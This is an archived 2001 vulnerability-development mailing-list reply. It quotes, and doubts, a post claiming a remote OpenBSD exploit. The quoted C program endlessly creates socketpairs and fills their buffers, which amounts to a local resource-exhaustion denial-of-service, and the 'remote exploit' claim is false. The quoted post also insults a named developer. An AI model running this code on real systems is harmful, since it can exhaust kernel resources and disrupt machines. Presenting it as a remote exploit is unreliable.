Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: proof of exploited code

From: Blue Boar <BlueBoar () thievco com>
Date: Wed, 06 Jun 2001 08:38:55 -0700
I let this through so that it might be refuted.

Now, I'm no expert on the socket calls... but it seems
to me that if this were a remote exploit, there
would have to be a destination IP address..or port
number.. or, you know, some sort of shellcode or
something.

So what is it then, a fork bomb for the machine that runs it?

                                Ryan

Fsck Theo Dumbraadt wrote:


This code shows a remote exploit for opensbsd versions 2.8 and 2.9

and can now be released to the public to break theo's 4 years without

remote exploits sayings. I wrote it while people told me it could not

happen on the list so here is your proofs bitch.

//

// peewee.c

// peewee herman prove of consept this code will show all of the

// world how vulnirable OpenBSD is and how Theo Dumbraadt is

// not more than a liar copyraadt 2001 by Jigglypuff

// http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg

// this proggie is GPL licensed to those who use it keep my

// credits and not be a lamer

//

#include        <unistd.h>

#include        <sys/socket.h>

#include        <fcntl.h>

#define         BUFFERSIZE      409600

extern  int

main(void)

{

        int             p[2], i;

        char            crap[BUFFERSIZE];

        while (1)

        {

                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)

                        break;

                i = BUFFERSIZE;

                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));

                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));

                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));

                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));

                fcntl(p[0], F_SETFL, O_NONBLOCK);

                fcntl(p[1], F_SETFL, O_NONBLOCK);

                write(p[0], crap, BUFFERSIZE);

                write(p[1], crap, BUFFERSIZE);

        }

        return(0);

}

* Get your free email at http://www.inbox.net
Previous By Date Next
Previous By Thread Next

Current thread: